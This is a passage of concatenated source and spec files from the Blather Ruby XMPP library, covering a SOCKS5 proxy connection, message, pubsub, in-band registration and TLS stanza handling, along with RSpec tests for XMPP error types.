# def receive_data(data)
# send_data("you said: #{data}")
# end
# end
#
# EM.connect socks_host, socks_port, MyConn, host, port
#
# @private
class Socks5 < Connection
def initialize(host, port)
@host = host
@port = port
@socks_error_code = nil
@buffer = ''
@socks_state = :method_negotiation
@socks_methods = [0] # TODO: other authentication methods
setup_methods
end
def setup_methods
class << self
def post_init; socks_post_init; end
def receive_data(*a); socks_receive_data(*a); end
end
end
def restore_methods
class << self
remove_method :post_init
remove_method :receive_data
end
end
def socks_post_init
packet = [5, @socks_methods.size].pack('CC') + @socks_methods.pack('C*')
send_data(packet)
end
def socks_receive_data(data)
@buffer << data
if @socks_state == :method_negotiation
return if @buffer.size < 2
header_resp = @buffer.slice! 0, 2
_, method_code = header_resp.unpack("cc")
if @socks_methods.include?(method_code)
@socks_state = :connecting
packet = [5, 1, 0].pack("C*")
if @host =~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ # IPv4
packet << [1, $1.to_i, $2.to_i, $3.to_i, $4.to_i].pack("C*")
elsif @host.include?(":") # IPv6
l, r = if @host =~ /^(.*)::(.*)$/
[$1,$2].map {|i| i.split ":"}
else
[@host.split(":"),[]]
end
dec_groups = (l + Array.new(8-l.size-r.size, '0') + r).map {|i| i.hex}
packet << ([4] + dec_groups).pack("Cn8")
else # Domain
packet << [3, @host.length, @host].pack("CCA*")
end
packet << [@port].pack("n")
send_data packet
else
@socks_state = :invalid
@socks_error_code = method_code
close_connection
return
end
elsif @socks_state == :connecting
return if @buffer.size < 4
header_resp = @buffer.slice! 0, 4
_, response_code, _, address_type = header_resp.unpack("C*")
if response_code == 0
case address_type
when 1
@buffer.slice! 0, 4
when 3
len = @buffer.slice! 0, 1
@buffer.slice! 0, len.unpack("C").first
when 4
@buffer.slice! 0, 16
else
@socks_state = :invalid
@socks_error_code = address_type
close_connection
return
end
@buffer.slice! 0, 2
@socks_state = :connected
restore_methods
post_init
receive_data(@buffer) unless @buffer.empty?
else
@socks_state = :invalid
@socks_error_code = response_code
close_connection
return
end
end
end
end
end
end
<file_sep>/spec/blather/errors/stream_error_spec.rb
require 'spec_helper'
def stream_error_node(error = 'internal-server-error', msg = nil)
node = Blather::XMPPNode.new('error')
node.namespace = {'stream' => Blather::Stream::STREAM_NS}
node << (err = Blather::XMPPNode.new(error, node.document))
err.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
if msg
node << (text = Blather::XMPPNode.new('text', node.document))
text.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
text.content = msg
end
node << (extra = Blather::XMPPNode.new('extra-error', node.document))
extra.namespace = 'blather:stream:error'
extra.content = 'Blather Error'
node
end
describe 'Blather::StreamError' do
it 'can import a node' do
err = stream_error_node 'internal-server-error', 'the message'
expect(Blather::StreamError).to respond_to :import
e = Blather::StreamError.import err
expect(e).to be_kind_of Blather::StreamError
expect(e.name).to eq(:internal_server_error)
expect(e.text).to eq('the message')
expect(e.extras).to eq(err.find('descendant::*[name()="extra-error"]', 'blather:stream:error').map {|n|n})
end
end
describe 'Blather::StreamError when instantiated' do
before do
@err_name = 'internal-server-error'
@msg = 'the server has experienced a misconfiguration'
@err = Blather::StreamError.import stream_error_node(@err_name, @msg)
end
it 'provides a err_name attribute' do
expect(@err).to respond_to :name
expect(@err.name).to eq(@err_name.gsub('-','_').to_sym)
end
it 'provides a text attribute' do
expect(@err).to respond_to :text
expect(@err.text).to eq(@msg)
end
it 'provides an extras attribute' do
expect(@err).to respond_to :extras
expect(@err.extras).to be_instance_of Array
expect(@err.extras.size).to eq(1)
expect(@err.extras.first.element_name).to eq('extra-error')
end
it 'describes itself' do
expect(@err.to_s).to match(/#{@type}/)
expect(@err.to_s).to match(/#{@msg}/)
expect(@err.inspect).to match(/#{@type}/)
expect(@err.inspect).to match(/#{@msg}/)
end
it 'can be turned into xml' do
expect(@err).to respond_to :to_xml
doc = parse_stanza @err.to_xml
expect(doc.xpath("//err_ns:internal-server-error", :err_ns => Blather::StreamError::STREAM_ERR_NS)).not_to be_empty
expect(doc.xpath("//err_ns:text[.='the server has experienced a misconfiguration']", :err_ns => Blather::StreamError::STREAM_ERR_NS)).not_to be_empty
expect(doc.xpath("//err_ns:extra-error[.='Blather Error']", :err_ns => 'blather:stream:error')).not_to be_empty
end
end
describe 'Each XMPP stream error type' do
%w[ bad-format
bad-namespace-prefix
conflict
connection-timeout
host-gone
host-unknown
improper-addressing
internal-server-error
invalid-from
invalid-id
invalid-namespace
invalid-xml
not-authorized
policy-violation
remote-connection-failed
resource-constraint
restricted-xml
see-other-host
system-shutdown
undefined-condition
unsupported-encoding
unsupported-stanza-type
unsupported-version
xml-not-well-formed
].each do |error_type|
it "handles the name for #{error_type}" do
e = Blather::StreamError.import stream_error_node(error_type)
expect(e.name).to eq(error_type.gsub('-','_').to_sym)
end
end
end
<file_sep>/lib/blather/stanza/message.rb
module Blather
class Stanza
# # Message Stanza
#
# [RFC 3921 Section 2.1 - Message Syntax](http://xmpp.org/rfcs/rfc3921.html#rfc.section.2.1)
#
# Exchanging messages is a basic use of XMPP and occurs when a user
# generates a message stanza that is addressed to another entity. The
# sender's server is responsible for delivering the message to the intended
# recipient (if the recipient is on the same local server) or for routing
# the message to the recipient's server (if the recipient is on a remote
# server). Thus a message stanza is used to "push" information to another
# entity.
#
# ## "To" Attribute
#
# An instant messaging client specifies an intended recipient for a message
# by providing the JID of an entity other than the sender in the `to`
# attribute of the Message stanza. If the message is being sent outside the
# context of any existing chat session or received message, the value of the
# `to` address SHOULD be of the form "user@domain" rather than of the form
# "user@domain/resource".
#
# msg = Message.new 'user@domain.tld/resource'
# msg.to == 'user@domain.tld/resource'
#
# msg.to = 'another-user@some-domain.tld/resource'
# msg.to == 'another-user@some-domain.tld/resource'
#
# The `to` attribute on a Message stanza works like any regular ruby object
# attribute
#
# ## "Type" Attribute
#
# Common uses of the message stanza in instant messaging applications
# include: single messages; messages sent in the context of a one-to-one
# chat session; messages sent in the context of a multi-user chat room;
# alerts, notifications, or other information to which no reply is expected;
# and errors. These uses are differentiated via the `type` attribute. If
# included, the `type` attribute MUST have one of the following values:
#
# * `:chat` -- The message is sent in the context of a one-to-one chat
# session. Typically a receiving client will present message of type
# `chat` in an interface that enables one-to-one chat between the two
# parties, including an appropriate conversation history.
#
# * `:error` -- The message is generated by an entity that experiences an
# error in processing a message received from another entity. A client
# that receives a message of type `error` SHOULD present an appropriate
# interface informing the sender of the nature of the error.
#
# * `:groupchat` -- The message is sent in the context of a multi-user chat
# environment (similar to that of [IRC]). Typically a receiving client
# will present a message of type `groupchat` in an interface that enables
# many-to-many chat between the parties, including a roster of parties in
# the chatroom and an appropriate conversation history.
#
# * `:headline` -- The message provides an alert, a notification, or other
# information to which no reply is expected (e.g., news headlines, sports
# updates, near-real-time market data, and syndicated content). Because no
# reply to the message is expected, typically a receiving client will
# present a message of type "headline" in an interface that appropriately
# differentiates the message from standalone messages, chat messages, or
# groupchat messages (e.g., by not providing the recipient with the
# ability to reply).
#
# * `:normal` -- The message is a standalone message that is sent outside
# the context of a one-to-one conversation or groupchat, and to which it
# is expected that the recipient will reply. Typically a receiving client
# will present a message of type `normal` in an interface that enables the
# recipient to reply, but without a conversation history. The default
# value of the `type` attribute is `normal`.
#
# Blather provides a helper for each possible type:
#
# Message#chat?
# Message#error?
# Message#groupchat?
# Message#headline?
# Message#normal?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `chat`.
#
# msg = Message.new
# msg.type # => :chat
# msg.chat? # => true
# msg.type = :normal
# msg.normal? # => true
# msg.chat? # => false
#
# msg.type = :invalid # => RuntimeError
#
#
# ## "Body" Element
#
# The `body` element contains human-readable XML character data that
# specifies the textual contents of the message; this child element is
# normally included but is optional.
#
# Blather provides an attribute-like syntax for Message `body` elements.
#
# msg = Message.new '<EMAIL>', 'message body'
# msg.body # => 'message body'
#
# msg.body = 'other message'
# msg.body # => 'other message'
#
# ## "Subject" Element
#
# The `subject` element contains human-readable XML character data that
# specifies the topic of the message.
#
# Blather provides an attribute-like syntax for Message `subject` elements.
#
# msg = Message.new '<EMAIL>', 'message body'
# msg.subject = 'message subject'
# msg.subject # => 'message subject'
#
# ## "Thread" Element
#
# The primary use of the XMPP `thread` element is to uniquely identify a
# conversation thread or "chat session" between two entities instantiated by
# Message stanzas of type `chat`. However, the XMPP thread element can also
# be used to uniquely identify an analogous thread between two entities
# instantiated by Message stanzas of type `headline` or `normal`, or among
# multiple entities in the context of a multi-user chat room instantiated by
# Message stanzas of type `groupchat`. It MAY also be used for Message
# stanzas not related to a human conversation, such as a game session or an
# interaction between plugins. The `thread` element is not used to identify
# individual messages, only conversations or messagingg sessions. The
# inclusion of the `thread` element is optional.
#
# The value of the `thread` element is not human-readable and MUST be
# treated as opaque by entities; no semantic meaning can be derived from it,
# and only exact comparisons can be made against it. The value of the
# `thread` element MUST be a universally unique identifier (UUID) as
# described in [UUID].
#
# The `thread` element MAY possess a 'parent' attribute that identifies
# another thread of which the current thread is an offshoot or child; the
# value of the 'parent' must conform to the syntax of the `thread` element
# itself.
#
# Blather provides an attribute-like syntax for Message `thread` elements.
#
# msg = Message.new
# msg.thread = '12345'
# msg.thread # => '12345'
#
# Parent threads can be set using a hash:
#
# msg.thread = {'parent-id' => 'thread-id'}
# msg.thread # => 'thread-id'
# msg.parent_thread # => 'parent-id'
#
# @handler :message
class Message < Stanza
# @private
VALID_TYPES = [:chat, :error, :groupchat, :headline, :normal].freeze
# @private
VALID_CHAT_STATES = [:active, :composing, :gone, :inactive, :paused].freeze
# @private
CHAT_STATE_NS = 'http://jabber.org/protocol/chatstates'.freeze
# @private
HTML_NS = 'http://jabber.org/protocol/xhtml-im'.freeze
# @private
HTML_BODY_NS = 'http://www.w3.org/1999/xhtml'.freeze
register :message
# @private
def self.import(node)
klass = nil
node.children.detect do |e|
ns = e.namespace ? e.namespace.href : nil
klass = class_from_registration(e.element_name, ns)
end
if klass == Blather::Stanza::Presence::MUCUser
klass = Blather::Stanza::Message::MUCUser
end
if klass && klass != self && ![Blather::Stanza::X, Blather::Stanza::Iq].include?(klass)
klass.import(node)
else
new(node[:type]).inherit(node)
end
end
# Create a new Message stanza
#
# @param [#to_s] to the JID to send the message to
# @param [#to_s] body the body of the message
# @param [Symbol] type the message type. Must be one of VALID_TYPES
def self.new(to = nil, body = nil, type = :chat)
node = super :message
node.to = to
node.type = type
node.body = body
node
end
# Overrides the parent method to ensure the current chat state is removed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
xpath('ns:*', :ns => CHAT_STATE_NS).remove
super
end
# Check if the Message is of type :chat
#
# @return [true, false]
def chat?
self.type == :chat
end
# Check if the Message is of type :error
#
# @return [true, false]
def error?
self.type == :error
end
# Check if the Message is of type :groupchat
#
# @return [true, false]
def groupchat?
self.type == :groupchat
end
# Check if the Message is of type :headline
#
# @return [true, false]
def headline?
self.type == :headline
end
# Check if the Message is of type :normal
#
# @return [true, false]
def normal?
self.type == :normal
end
# Ensures type is :get, :set, :result or :error
#
# @param [#to_sym] type the Message type. Must be one of VALID_TYPES
def type=(type)
if type && !VALID_TYPES.include?(type.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
super
end
# Get the message body
#
# @return [String]
def body
read_content :body
end
# Set the message body
#
# @param [#to_s] body the message body
def body=(body)
set_content_for :body, body
end
# Get the message xhtml node
# This will create the node if it doesn't exist
#
# @return [XML::Node]
def xhtml_node
unless h = find_first('ns:html', :ns => HTML_NS) || find_first('ns:html', :ns => HTML_BODY_NS)
self << (h = XMPPNode.new('html', self.document))
h.namespace = HTML_NS
end
unless b = h.find_first('ns:body', :ns => HTML_BODY_NS)
b = XMPPNode.new('body', self.document)
b.namespace = HTML_BODY_NS
h << b
end
b
end
# Get the message xhtml
#
# @return [String]
def xhtml
self.xhtml_node.inner_html.strip
end
# Set the message xhtml
# This will use Nokogiri to ensure the xhtml is valid
#
# @param [#to_s] valid xhtml
def xhtml=(xhtml_body)
self.xhtml_node.inner_html = Nokogiri::XML::DocumentFragment.parse(xhtml_body)
end
# Get the message subject
#
# @return [String]
def subject
read_content :subject
end
# Set the message subject
#
# @param [#to_s] body the message subject
def subject=(subject)
set_content_for :subject, subject
end
# Get the message thread
#
# @return [String]
def thread
read_content :thread
end
# Get the parent thread
#
# @return [String, nil]
def parent_thread
n = find_first('thread')
n[:parent] if n
end
# Set the thread
#
# @overload thread=(hash)
# Set a thread with a parent
# @param [Hash<parent-id => thread-id>] thread
# @overload thread=(thread)
# Set a thread id
# @param [#to_s] thread the new thread id
def thread=(thread)
parent, thread = thread.to_a.flatten if thread.is_a?(Hash)
set_content_for :thread, thread
find_first('thread')[:parent] = parent
end
# Returns the message's x:data form child
def form
X.find_or_create self
end
# Get the message chat state
#
# @return [Symbol]
def chat_state
if (elem = find_first('ns:*', :ns => CHAT_STATE_NS)) && VALID_CHAT_STATES.include?(name = elem.name.to_sym)
name
end
end
# Set the message chat state
#
# @param [#to_s] chat_state the message chat state. Must be one of VALID_CHAT_STATES
def chat_state=(chat_state)
if chat_state && !VALID_CHAT_STATES.include?(chat_state.to_sym)
raise ArgumentError, "Invalid Chat State (#{chat_state}), use: #{VALID_CHAT_STATES*' '}"
end
xpath('ns:*', :ns => CHAT_STATE_NS).remove
if chat_state
state = XMPPNode.new(chat_state, self.document)
state.namespace = CHAT_STATE_NS
self << state
end
end
def delay
if d = find_first('ns:delay', :ns => "urn:xmpp:delay")
Delay.new d
end
end
def delayed?
!!delay
end
class Delay < XMPPNode
def self.new(stamp = nil, from = nil, description = nil)
new_node = super :delay
case stamp
when Nokogiri::XML::Node
new_node.inherit stamp
when Hash
new_node.stamp = stamp[:stamp]
new_node.from = stamp[:from]
new_node.description = stamp[:description]
else
new_node.stamp = stamp
new_node.from = from
new_node.description = description
end
new_node
end
def from
read_attr :from
end
def stamp
s = read_attr :stamp
s && Time.parse(s)
end
def description
content.strip
end
end
end
end
end
<file_sep>/lib/blather/stanza/pubsub/retract.rb
module Blather
class Stanza
class PubSub
# # PubSub Retract Stanza
#
# [XEP-0060 Section 7.2 - Delete an Item from a Node](http://xmpp.org/extensions/xep-0060.html#publisher-delete)
#
# @handler :pubsub_retract
class Retract < PubSub
register :pubsub_retract, :retract, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Createa new Retraction stanza
#
# @param [String] host the host to send the request to
# @param [String] node the node to retract items from
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [Array<String>] retractions an array of ids to retract
def self.new(host = nil, node = nil, type = :set, retractions = [])
new_node = super(type, host)
new_node.node = node
new_node.retractions = retractions
new_node
end
# Get the name of the node to retract from
#
# @return [String]
def node
retract[:node]
end
# Set the name of the node to retract from
#
# @param [String] node
def node=(node)
retract[:node] = node
end
# Get or create the actual retract node
#
# @return [Blather::XMPPNode]
def retract
unless retract = pubsub.find_first('ns:retract', :ns => self.class.registered_ns)
self.pubsub << (retract = XMPPNode.new('retract', self.document))
retract.namespace = self.pubsub.namespace
end
retract
end
# Set the retraction ids
#
# @overload retractions=(id)
# @param [String] id an ID to retract
# @overload retractions=(ids)
# @param [Array<String>] ids an array of IDs to retract
def retractions=(retractions = [])
[retractions].flatten.each do |id|
self.retract << PubSubItem.new(id, nil, self.document)
end
end
# Get the list of item IDs to retract
#
# @return [Array<String>]
def retractions
retract.find('ns:item', :ns => self.class.registered_ns).map do |i|
i[:id]
end
end
# Iterate over each retraction ID
#
# @yieldparam [String] id an ID to retract
def each(&block)
retractions.each &block
end
# The size of the retractions array
#
# @return [Fixnum]
def size
retractions.size
end
end # Retract
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/items.rb
module Blather
class Stanza
class PubSub
# # PubSub Items Stanza
#
# [XEP-0060 Section 6.5 - Retrieve Items from a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-retrieve)
#
# @handler :pubsub_items
class Items < PubSub
register :pubsub_items, :items, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Create a new Items request
#
# @param [String] host the pubsub host to send the request to
# @param [String] path the path of the node
# @param [Array<String>] list an array of IDs to request
# @param [#to_s] max the maximum number of items to return
#
# @return [Blather::Stanza::PubSub::Items]
def self.request(host, path, list = [], max = nil)
node = self.new :get, host
node.node = path
node.max_items = max
(list || []).each do |id|
node.items_node << PubSubItem.new(id, nil, node.document)
end
node
end
# Overrides the parent to ensure an items node is created
# @private
def self.new(type = nil, host = nil)
new_node = super
new_node.items
new_node
end
# Get the node name
#
# @return [String]
def node
items_node[:node]
end
# Set the node name
#
# @param [String, nil] node
def node=(node)
items_node[:node] = node
end
# Get the max number of items requested
#
# @return [Fixnum, nil]
def max_items
items_node[:max_items].to_i if items_node[:max_items]
end
# Set the max number of items requested
#
# @param [Fixnum, nil] max_items
def max_items=(max_items)
items_node[:max_items] = max_items
end
# Iterate over the list of items
#
# @yieldparam [Blather::Stanza::PubSub::PubSubItem] item
def each(&block)
items.each &block
end
# Get the list of items on this stanza
#
# @return [Array<Blather::Stanza::PubSub::PubSubItem>]
def items
items_node.find('ns:item', :ns => self.class.registered_ns).map do |i|
PubSubItem.new(nil,nil,self.document).inherit i
end
end
# Get or create the actual items node
#
# @return [Blather::XMPPNode]
def items_node
unless node = self.pubsub.find_first('ns:items', :ns => self.class.registered_ns)
(self.pubsub << (node = XMPPNode.new('items', self.document)))
node.namespace = self.pubsub.namespace
end
node
end
end # Items
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/query.rb
module Blather
class Stanza
class Iq
# # Query Stanza
#
# This is a base class for any query based Iq stanzas. It provides a base set
# of methods for working with query stanzas
#
# @handler :query
class Query < Iq
register :query, :query
# Overrides the parent method to ensure a query node is created
#
# @see Blather::Stanza::Iq.new
def self.new(*)
node = super
node.query
node
end
# Overrides the parent method to ensure the current query node is destroyed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
query.remove
super
end
# Query node accessor
# If a query node exists it will be returned.
# Otherwise a new node will be created and returned
#
# @return [Balather::XMPPNode]
def query
q = if self.class.registered_ns
find_first('query_ns:query', :query_ns => self.class.registered_ns)
else
find_first('query')
end
unless q
(self << (q = XMPPNode.new('query', self.document)))
q.namespace = self.class.registered_ns
end
q
end
end #Query
end #Iq
end #Stanza
end
<file_sep>/spec/blather/stanza/pubsub_owner_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSubOwner do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:pubsub, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner)
end
it 'ensures a pubusb node is present on create' do
pubsub = Blather::Stanza::PubSubOwner.new
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_nil
end
it 'ensures a pubsub node exists when calling #pubsub' do
pubsub = Blather::Stanza::PubSubOwner.new
pubsub.remove_children :pubsub
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_nil
expect(pubsub.pubsub).not_to be_nil
expect(pubsub.find_first('/iq/ns:pubsub', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_nil
end
it 'sets the host if requested' do
aff = Blather::Stanza::PubSubOwner.new :get, 'pubsub.jabber.local'
expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
end
<file_sep>/lib/blather/stream/features/tls.rb
module Blather
class Stream
# @private
class TLS < Features
class TLSFailure < BlatherError
register :tls_failure
end
TLS_NS = 'urn:ietf:params:xml:ns:xmpp-tls'.freeze
register TLS_NS
def receive_data(stanza)
case stanza.element_name
when 'starttls'
@stream.send "<starttls xmlns='#{TLS_NS}'/>"
when 'proceed'
@stream.start_tls(:verify_peer => true)
@stream.start
else
fail! TLSFailure.new
end
end
end #TLS
end #Stream
end #Blather
<file_sep>/lib/blather/stanza/iq/ibr.rb
module Blather
class Stanza
class Iq
# # In-Band Registration
#
# [XEP-0077: In-Band Registration](https://xmpp.org/extensions/xep-0077.html)
#
# @handler :ibr
class IBR < Query
register :ibr, nil, "jabber:iq:register"
def registered=(reg)
query.at_xpath("./ns:registered", ns: self.class.registered_ns)&.remove
node = Nokogiri::XML::Node.new("registered", document)
node.default_namespace = self.class.registered_ns
query << node if reg
end
def registered?
!!query.at_xpath("./ns:registered", ns: self.class.registered_ns)
end
def remove!
query.children.remove
node = Nokogiri::XML::Node.new("remove", document)
node.default_namespace = self.class.registered_ns
query << node
end
def remove?
!!query.at_xpath("./ns:remove", ns: self.class.registered_ns)
end
def form
X.find_or_create(query)
end
[
"instructions",
"username",
"nick",
"<PASSWORD>",
"name",
"first",
"last",
"email",
"address",
"city",
"state",
"zip",
"phone",
"url",
"date"
].each do |tag|
define_method("#{tag}=") do |v|
query.at_xpath("./ns:#{tag}", ns: self.class.registered_ns)&.remove
node = Nokogiri::XML::Node.new(tag, document)
node.default_namespace = self.class.registered_ns
node.content = v
query << node
end
define_method(tag) do
query.at_xpath("./ns:#{tag}", ns: self.class.registered_ns)&.content
end
end
end
end #Iq
end #Stanza
end
<file_sep>/spec/blather/errors/stanza_error_spec.rb
require 'spec_helper'
def stanza_error_node(type = 'cancel', error = 'internal-server-error', msg = nil)
node = Blather::Stanza::Message.new '<EMAIL>', 'test message', :error
node << (error_node = Blather::XMPPNode.new('error'))
error_node['type'] = type.to_s
error_node << (err = Blather::XMPPNode.new(error, error_node.document))
err.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
if msg
error_node << (text = Blather::XMPPNode.new('text', error_node.document))
text.namespace = 'urn:ietf:params:xml:ns:xmpp-stanzas'
text.content = msg
end
error_node << (extra = Blather::XMPPNode.new('extra-error', error_node.document))
extra.namespace = 'blather:stanza:error'
extra.content = 'Blather Error'
node
end
describe Blather::StanzaError do
it 'can import a node' do
expect(Blather::StanzaError).to respond_to :import
e = Blather::StanzaError.import stanza_error_node
expect(e).to be_kind_of Blather::StanzaError
end
describe 'valid types' do
before { @original = Blather::Stanza::Message.new '<EMAIL>', 'test message', :error }
it 'ensures type is one of Stanza::Message::VALID_TYPES' do
expect { Blather::StanzaError.new @original, :gone, :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::StanzaError::VALID_TYPES.each do |valid_type|
msg = Blather::StanzaError.new @original, :gone, valid_type
expect(msg.type).to eq(valid_type)
end
end
end
describe 'when instantiated' do
before do
@type = 'cancel'
@err_name = 'internal-server-error'
@msg = 'the server has experienced a misconfiguration'
@err = Blather::StanzaError.import stanza_error_node(@type, @err_name, @msg)
end
it 'provides a type attribute' do
expect(@err).to respond_to :type
expect(@err.type).to eq(@type.to_sym)
end
it 'provides a name attribute' do
expect(@err).to respond_to :name
expect(@err.name).to eq(@err_name.gsub('-','_').to_sym)
end
it 'provides a text attribute' do
expect(@err).to respond_to :text
expect(@err.text).to eq(@msg)
end
it 'provides a reader to the original node' do
expect(@err).to respond_to :original
expect(@err.original).to be_instance_of Blather::Stanza::Message
end
it 'provides an extras attribute' do
expect(@err).to respond_to :extras
expect(@err.extras).to be_instance_of Array
expect(@err.extras.first.element_name).to eq('extra-error')
end
it 'describes itself' do
expect(@err.to_s).to match(/#{@err_name}/)
expect(@err.to_s).to match(/#{@msg}/)
expect(@err.inspect).to match(/#{@err_name}/)
expect(@err.inspect).to match(/#{@msg}/)
end
it 'can be turned into xml' do
expect(@err).to respond_to :to_xml
doc = parse_stanza @err.to_xml
expect(doc.xpath("/message[@from='<EMAIL>' and @type='error']")).not_to be_empty
expect(doc.xpath("/message/error")).not_to be_empty
expect(doc.xpath("/message/error/err_ns:internal-server-error", :err_ns => Blather::StanzaError::STANZA_ERR_NS)).not_to be_empty
expect(doc.xpath("/message/error/err_ns:text[.='the server has experienced a misconfiguration']", :err_ns => Blather::StanzaError::STANZA_ERR_NS)).not_to be_empty
expect(doc.xpath("/message/error/extra_ns:extra-error[.='Blather Error']", :extra_ns => 'blather:stanza:error')).not_to be_empty
end
end
describe 'each XMPP stanza error type' do
%w[ bad-request
conflict
feature-not-implemented
forbidden
gone
internal-server-error
item-not-found
jid-malformed
not-acceptable
not-allowed
not-authorized
payment-required
recipient-unavailable
redirect
registration-required
remote-server-not-found
remote-server-timeout
resource-constraint
service-unavailable
subscription-required
undefined-condition
unexpected-request
].each do |error_type|
it "handles the name for #{error_type}" do
e = Blather::StanzaError.import stanza_error_node(:cancel, error_type)
expect(e.name).to eq(error_type.gsub('-','_').to_sym)
end
end
end
end
<file_sep>/lib/blather/errors.rb
module Blather
# Main error class
# This starts the error hierarchy
#
# @handler :error
class BlatherError < StandardError
class_attribute :handler_hierarchy
self.handler_hierarchy ||= []
# @private
@@handler_list = []
# Register the class's handler
#
# @param [Symbol] handler the handler name
def self.register(handler)
@@handler_list << handler
self.handler_hierarchy = [handler] + self.handler_hierarchy
end
# The list of registered handlers
#
# @return [Array<Symbol>] a list of currently registered handlers
def self.handler_list
@@handler_list
end
register :error
# @private
# HACK!! until I can refactor the entire Error object model
def id
nil
end
end # BlatherError
# Used in cases where a stanza only allows specific values for its attributes
# and an invalid value is attempted.
#
# @handler :argument_error
class ArgumentError < BlatherError
register :argument_error
end # ArgumentError
# The stream handler received a response it didn't know how to handle
#
# @handler :unknown_response_error
class UnknownResponse < BlatherError
register :unknown_response_error
attr_reader :node
def initialize(node)
@node = node
end
end # UnknownResponse
# Something bad happened while parsing the incoming stream
#
# @handler :parse_error
class ParseError < BlatherError
register :parse_error
attr_reader :message
def initialize(msg)
@message = msg.to_s
end
end # ParseError
end # Blather
<file_sep>/spec/blather/stanza/iq/si_spec.rb
require 'spec_helper'
def si_xml
<<-XML
<iq type='set' id='offer1' to='<EMAIL>/balcony' from='<EMAIL>/orchard'>
<si xmlns='http://jabber.org/protocol/si'
id='a0'
mime-type='text/plain'
profile='http://jabber.org/protocol/si/profile/file-transfer'>
<file xmlns='http://jabber.org/protocol/si/profile/file-transfer'
name='test.txt'
size='1022'>
<range/>
</file>
<feature xmlns='http://jabber.org/protocol/feature-neg'>
<x xmlns='jabber:x:data' type='form'>
<field var='stream-method' type='list-single'>
<option><value>http://jabber.org/protocol/bytestreams</value></option>
<option><value>http://jabber.org/protocol/ibb</value></option>
</field>
</x>
</feature>
</si>
</iq>
XML
end
describe Blather::Stanza::Iq::Si do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:si, 'http://jabber.org/protocol/si')).to eq(Blather::Stanza::Iq::Si)
end
it 'can be imported' do
node = Blather::XMPPNode.parse si_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Si
expect(node.si).to be_instance_of Blather::Stanza::Iq::Si::Si
end
it 'ensures a si node is present on create' do
iq = Blather::Stanza::Iq::Si.new
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).not_to be_empty
end
it 'ensures a si node exists when calling #si' do
iq = Blather::Stanza::Iq::Si.new
iq.si.remove
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).to be_empty
expect(iq.si).not_to be_nil
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si')).not_to be_empty
end
it 'ensures a si node is replaced when calling #si=' do
iq = Blather::XMPPNode.parse si_xml
new_si = Blather::Stanza::Iq::Si::Si.new
new_si.id = 'a1'
iq.si = new_si
expect(iq.xpath('ns:si', :ns => 'http://jabber.org/protocol/si').size).to eq(1)
expect(iq.si.id).to eq('a1')
end
end
describe Blather::Stanza::Iq::Si::Si do
it 'can set and get attributes' do
si = Blather::Stanza::Iq::Si::Si.new
si.id = 'a1'
si.mime_type = 'text/plain'
si.profile = 'http://jabber.org/protocol/si/profile/file-transfer'
expect(si.id).to eq('a1')
expect(si.mime_type).to eq('text/plain')
expect(si.profile).to eq('http://jabber.org/protocol/si/profile/file-transfer')
end
end
describe Blather::Stanza::Iq::Si::Si::File do
it 'can be initialized with name and size' do
file = Blather::Stanza::Iq::Si::Si::File.new('test.txt', 123)
expect(file.name).to eq('test.txt')
expect(file.size).to eq(123)
end
it 'can be initialized with node' do
node = Blather::XMPPNode.parse si_xml
file = Blather::Stanza::Iq::Si::Si::File.new node.find_first('.//ns:file', :ns => 'http://jabber.org/protocol/si/profile/file-transfer')
expect(file.name).to eq('test.txt')
expect(file.size).to eq(1022)
end
it 'can set and get description' do
file = Blather::Stanza::Iq::Si::Si::File.new('test.txt', 123)
file.desc = 'This is a test. If this were a real file...'
expect(file.desc).to eq('This is a test. If this were a real file...')
end
end
<file_sep>/lib/blather/stanza/pubsub/create.rb
module Blather
class Stanza
class PubSub
# # PubSub Create Stanza
#
# [XEP-0060 Section 8.1 - Create a Node](http://xmpp.org/extensions/xep-0060.html#owner-create)
#
# @handler :pubsub_create
class Create < PubSub
register :pubsub_create, :create, self.registered_ns
# Create a new Create Stanza
#
# @param [<Blather::Stanza::Iq::VALID_TYPES>] type the node type
# @param [String, nil] host the host to send the request to
# @param [String, nil] node the name of the node to create
def self.new(type = :set, host = nil, node = nil)
new_node = super(type, host)
new_node.create_node
new_node.configure_node
new_node.node = node
new_node
end
# Get the name of the node to create
#
# @return [String, nil]
def node
create_node[:node]
end
# Set the name of the node to create
#
# @param [String, nil] node
def node=(node)
create_node[:node] = node
end
# Get or create the actual create node on the stanza
#
# @return [Blather::XMPPNode]
def create_node
unless create_node = pubsub.find_first('ns:create', :ns => self.class.registered_ns)
self.pubsub << (create_node = XMPPNode.new('create', self.document))
create_node.namespace = self.pubsub.namespace
end
create_node
end
# Get or create the actual configure node on the stanza
#
# @return [Blather::XMPPNode]
def configure_node
unless configure_node = pubsub.find_first('ns:configure', :ns => self.class.registered_ns)
self.pubsub << (configure_node = XMPPNode.new('configure', self.document))
